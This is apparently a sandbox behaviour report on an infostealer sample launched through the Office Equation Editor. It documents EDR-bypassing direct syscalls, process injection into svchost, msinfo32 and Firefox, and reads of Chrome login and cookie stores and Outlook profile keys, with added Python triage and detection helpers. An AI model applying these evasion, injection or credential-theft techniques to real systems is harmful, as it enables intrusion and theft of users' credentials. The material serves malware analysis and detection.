Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtQueryValueKey: Direct from: 0x774CFACA
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtOpenSection: Direct from: 0x774CFDEA
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtProtectVirtualMemory: Direct from: 0x774D005A
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtSetInformationThread: Direct from: 0x774CFF12
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtWriteVirtualMemory: Direct from: 0x774CFE36
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtRequestWaitReplyPort: Direct from: 0x756F8D92
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtQueryVolumeInformationFile: Direct from: 0x774CFFAE
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtNotifyChangeKey: Direct from: 0x774D0F92
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtQueryAttributesFile: Direct from: 0x774CFE7E
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtReadVirtualMemory: Direct from: 0x774CFEB2
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtSetTimer: Direct from: 0x774E98D5
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtSetInformationFile: Direct from: 0x774CFC5A
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | NtQuerySystemInformation: Direct from: 0x774CFDD2
Source: C:\Users\user\AppData\Roaming\word.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe protection: execute and read and write
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | Section loaded: NULL target: C:\Windows\SysWOW64\msinfo32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: NULL target: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe protection: read write
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: NULL target: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\msinfo32.exe | Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msinfo32.exe | Thread APC queued: target process: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe
Source: C:\Users\user\AppData\Roaming\word.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008
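The run of "NtXxx: Direct from:" lines above is the evidence behind the "Found direct / indirect Syscall (likely to bypass EDR)" verdict: the sandbox observed the transition to kernel mode being issued from an address other than the exported ntdll stub for that call, so any user-mode hook an EDR had placed on those stubs never ran. The "Section loaded ... protection: execute and read and write" lines show what those syscalls were used for, namely executable sections mapped from one process into another, an APC queued in the target, and word.exe writing into svchost.exe. The Python below is an added triage helper written for this page, not code from the report or from Joe Sandbox. It reads lines in the export format (process and event run together; a " | " separator between them is also accepted), inventories the directly issued syscalls per process, lists which injection primitives that inventory is sufficient for, and rebuilds the injection graph. The syscall sets in PRIMITIVES are the editor's own minimal patterns, and the embedded sample carries twelve of the report's 36 syscall lines plus the cross-process lines; a syscall set only says what a process could do, the graph edges are the evidence of what it did.

```python
import ntpath
import re
from collections import defaultdict

# Added triage helper, not part of the Joe Sandbox report. Reads the report's
# evasion evidence lines and (1) inventories the syscalls a process issued
# directly, (2) lists which injection primitives that inventory is sufficient
# for, (3) rebuilds the cross-process injection graph from the "Section
# loaded" / "Thread APC queued" / "Memory written" lines.

INJECTOR = r"C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe"
WORD = r"C:\Users\user\AppData\Roaming\word.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
MSINFO = r"C:\Windows\SysWOW64\msinfo32.exe"
FIREFOX = r"C:\Program Files (x86)\Mozilla Firefox\firefox.exe"

# Syscall origins copied from the report's "Direct from:" lines (12 of 36).
DIRECT_SYSCALLS = [
    ("NtQueryInformationProcess", 0x774CFAFA), ("NtCreateUserProcess", 0x774D093E),
    ("NtWriteVirtualMemory", 0x774D213E), ("NtAllocateVirtualMemory", 0x774CFAE2),
    ("NtResumeThread", 0x774D008D), ("NtUnmapViewOfSection", 0x774CFCA2),
    ("NtSetInformationThread", 0x774CF9CE), ("NtMapViewOfSection", 0x774CFC72),
    ("NtCreateThreadEx", 0x774D08C6), ("NtProtectVirtualMemory", 0x774D005A),
    ("NtReadVirtualMemory", 0x774CFEB2), ("NtDelayExecution", 0x774CFDA1),
]

# Evidence in the export format ("Source: <process><event>[Jump to behavior]").
EVIDENCE = [f"Source: {INJECTOR}{c}: Direct from: 0x{a:08X}Jump to behavior" for c, a in DIRECT_SYSCALLS] + [
    f"Source: {WORD}Section loaded: NULL target: {SVCHOST} protection: execute and read and writeJump to behavior",
    f"Source: {SVCHOST}Section loaded: NULL target: {INJECTOR} protection: execute and read and writeJump to behavior",
    f"Source: {INJECTOR}Section loaded: NULL target: {SVCHOST} protection: execute and read and writeJump to behavior",
    f"Source: {INJECTOR}Section loaded: NULL target: {MSINFO} protection: execute and read and writeJump to behavior",
    f"Source: {MSINFO}Section loaded: NULL target: {INJECTOR} protection: execute and read and writeJump to behavior",
    f"Source: {MSINFO}Section loaded: NULL target: {FIREFOX} protection: execute and read and writeJump to behavior",
    f"Source: {MSINFO}Thread APC queued: target process: {INJECTOR}Jump to behavior",
    f"Source: {WORD}Memory written: {SVCHOST} base: 7EFDE008Jump to behavior",
]

SEP = r"(?: \| )?"  # tolerate a " | " separator between process and event
SYSCALL_RE = re.compile(r"^Source: (?P<proc>.+?\.exe)" + SEP + r"(?P<call>Nt\w+): Direct from: 0x(?P<addr>[0-9A-Fa-f]+)")
SECTION_RE = re.compile(r"^Source: (?P<src>.+?\.exe)" + SEP + r"Section loaded: NULL target: (?P<dst>.+?\.exe) protection: (?P<prot>.+)$")
APC_RE = re.compile(r"^Source: (?P<src>.+?\.exe)" + SEP + r"Thread APC queued: target process: (?P<dst>.+?\.exe)$")
WRITE_RE = re.compile(r"^Source: (?P<src>.+?\.exe)" + SEP + r"Memory written: (?P<dst>.+?\.exe) base: (?P<base>[0-9A-Fa-f]+)$")

# Editor's minimal syscall sets per primitive; every name must be present.
PRIMITIVES = {
    "remote-thread injection": {"NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtProtectVirtualMemory", "NtCreateThreadEx"},
    "process hollowing": {"NtCreateUserProcess", "NtUnmapViewOfSection", "NtWriteVirtualMemory", "NtResumeThread"},
    "section-mapping injection": {"NtMapViewOfSection", "NtCreateThreadEx"},
}


def _clean(line):
    suffix = "Jump to behavior"  # link text the HTML export glues onto each row
    return line[:-len(suffix)] if line.endswith(suffix) else line


def parse(lines):
    syscalls, edges = defaultdict(set), []
    for line in map(_clean, lines):
        if m := SYSCALL_RE.match(line):
            syscalls[m["proc"]].add(m["call"])
        elif m := SECTION_RE.match(line):
            edges.append((m["src"], m["dst"], f"section mapped ({m['prot']})"))
        elif m := APC_RE.match(line):
            edges.append((m["src"], m["dst"], "APC queued"))
        elif m := WRITE_RE.match(line):
            edges.append((m["src"], m["dst"], f"memory written at 0x{m['base']}"))
    return syscalls, edges


def primitives_for(calls):
    # Sufficiency only: the edges from parse() are the evidence of actual use.
    return sorted(name for name, needed in PRIMITIVES.items() if needed <= calls)


def rwx_targets(edges):
    return sorted({ntpath.basename(d) for _, d, t in edges if "execute" in t})


def triage(lines):
    syscalls, edges = parse(lines)
    return {
        "direct_syscalls": {ntpath.basename(p): sorted(c) for p, c in syscalls.items()},
        "primitives": {ntpath.basename(p): primitives_for(c) for p, c in syscalls.items()},
        "edges": [(ntpath.basename(s), ntpath.basename(d), t) for s, d, t in edges],
        "rwx_targets": rwx_targets(edges),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(EVIDENCE), indent=2))
```

Run against the full report the same parser also picks up the two NtRequestWaitReplyPort origins (0x753C6BCE, 0x756F8D92), which lie in a different module range from the 0x774Cxxxx cluster; whether a given origin sits inside or outside ntdll can only be decided with the module map of that process, which the report excerpt does not include, so the helper deliberately does not classify addresses.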
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0043916A LogonUserW,5_2_0043916A
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,5_2_0040D6D0
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_004375B0
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,5_2_00436431
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Users\user\AppData\Roaming\word.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exe | Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
Source: C:\Windows\SysWOW64\msinfo32.exe | Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
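The four "Process created" lines give the launch chain end to end: EQNEDT32.EXE (started by EXCEL.EXE according to the behavior graph) starts word.exe out of %AppData%, word.exe starts a SysWOW64 svchost.exe whose command line still reads word.exe, the injected uAjPOONiWk.exe starts msinfo32.exe, and msinfo32.exe starts Firefox. The Python below is an added detection example, not code from the report: it runs four parent/child checks of the kind the Sigma hits in the summary encode over those lines, copied verbatim from the export (a " | " separator is also accepted). The image/command-line mismatch is the check worth keeping in a production rule: an image of svchost.exe with a command line naming word.exe is consistent with a process created suspended and overwritten before it runs, which matches the NtCreateUserProcess, NtUnmapViewOfSection, NtWriteVirtualMemory and NtResumeThread syscalls listed above. The Office parent list and the services.exe rule are the editor's simplifications.

```python
import ntpath
import re

# Added detection example, not part of the Joe Sandbox report: parent/child
# checks of the kind behind the report's Sigma hits, applied to its four
# "Process created" lines.

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "eqnedt32.exe"}  # editor's list
NEVER_SPAWN = {"eqnedt32.exe"}  # the Equation Editor has no legitimate reason to create processes

PROC_RE = re.compile(
    r"^Source: (?P<parent>.+?\.exe)(?: \| )?Process created: (?P<rest>.+?)(?:Jump to behavior)?$", re.I)

# Lines copied from the report ("Source: <parent>Process created: <image> <command line>").
PROCESS_LINES = [
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\word.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\word.exeJump to behavior",
    r'Source: C:\Program Files (x86)\glkSBODVJdyBcFAgQxoMfLfXQiYZzZWxohNxhAMJxDoTtQwiljdDewzfvWjWfXAZJJVZuKARnLTQvX\uAjPOONiWk.exeProcess created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"Jump to behavior',
    r'Source: C:\Windows\SysWOW64\msinfo32.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior',
]


def split_image_cmdline(rest):
    # The export prints "<image path> <command line>"; the image ends at the first ".exe ".
    i = rest.lower().find(".exe ")
    return (rest, "") if i < 0 else (rest[:i + 4], rest[i + 5:])


def argv0_basename(cmdline):
    """Basename of argv[0] of a command line, quoted or not, lower-cased."""
    c = cmdline.strip()
    argv0 = c[1:c.find('"', 1)] if c.startswith('"') else c.split(" ", 1)[0]
    return ntpath.basename(argv0).lower()


def check(line):
    m = PROC_RE.match(line)
    if not m:
        return None
    parent = ntpath.basename(m["parent"]).lower()
    image, cmdline = split_image_cmdline(m["rest"])
    child = ntpath.basename(image).lower()
    alerts = []
    if parent in OFFICE_PARENTS and "\\appdata\\" in image.lower():
        alerts.append("office application spawned a binary from the user profile")
    if parent in NEVER_SPAWN:
        alerts.append("equation editor spawned a process (CVE-2017-11882 / CVE-2018-0802 pattern)")
    if cmdline and argv0_basename(cmdline) != child:
        alerts.append("command line names a different image (hollowing indicator)")
    if child == "svchost.exe" and parent != "services.exe":
        alerts.append("svchost.exe not started by services.exe")
    return {"parent": parent, "child": child, "cmdline": cmdline, "alerts": alerts}


def flagged(lines):
    return [r for r in map(check, lines) if r and r["alerts"]]


if __name__ == "__main__":
    for r in flagged(PROCESS_LINES):
        print(f"{r['parent']} -> {r['child']}: {'; '.join(r['alerts'])}")
```

The last two lines of the chain raise nothing under these four checks, which is the point of the msinfo32.exe and Firefox hops: both are legitimately signed images started with a matching command line, and only the injection evidence above ties them to the sample. A rule that wants to catch that stage needs the "Section loaded"/"Thread APC queued" telemetry, not process-creation events alone.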
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_00445DD3
Source: uAjPOONiWk.exe, 00000007.00000000.481571315.0000000000C20000.00000002.00000001.00040000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639715330.0000000000C20000.00000002.00000001.00040000.00000000.sdmp, uAjPOONiWk.exe, 00000009.00000000.510459077.0000000000900000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: word.exe, uAjPOONiWk.exe, 00000007.00000000.481571315.0000000000C20000.00000002.00000001.00040000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639715330.0000000000C20000.00000002.00000001.00040000.00000000.sdmp, uAjPOONiWk.exe, 00000009.00000000.510459077.0000000000900000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: word.exe, 00000005.00000000.426651290.0000000000482000.00000002.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.429628301.0000000000482000.00000002.00000001.01000000.00000004.sdmp, word.exe.2.dr, kontempt2.1[1].exe.2.dr | Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: uAjPOONiWk.exe, 00000007.00000000.481571315.0000000000C20000.00000002.00000001.00040000.00000000.sdmp, uAjPOONiWk.exe, 00000007.00000002.639715330.0000000000C20000.00000002.00000001.00040000.00000000.sdmp, uAjPOONiWk.exe, 00000009.00000000.510459077.0000000000900000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: !Progman
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_00410D10 cpuid 5_2_00410D10
Source: C:\Windows\SysWOW64\msinfo32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\02ld_.zip VolumeInformation (reported 8 times)
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_004223BC
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004711D2 GetUserNameW,5_2_004711D2
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,5_2_0042039F
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_0040E470
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\msinfo32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\SysWOW64\msinfo32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: kontempt2.1[1].exe.2.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: word.exe | Binary or memory string: WIN_XP
Source: word.exe | Binary or memory string: WIN_XPe
Source: word.exe | Binary or memory string: WIN_VISTA
Source: word.exe | Binary or memory string: WIN_7
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_004741BB
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,5_2_0046483C
Source: C:\Users\user\AppData\Roaming\word.exe | Code function: 5_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,5_2_0047AD92
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E0B34D sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,8_2_61E0B34D
Source: C:\Windows\SysWOW64\msinfo32.exe | Code function: 8_2_61E2D5B6 sqlite3_bind_double,sqlite3_mutex_leave,8_2_61E2D5B6
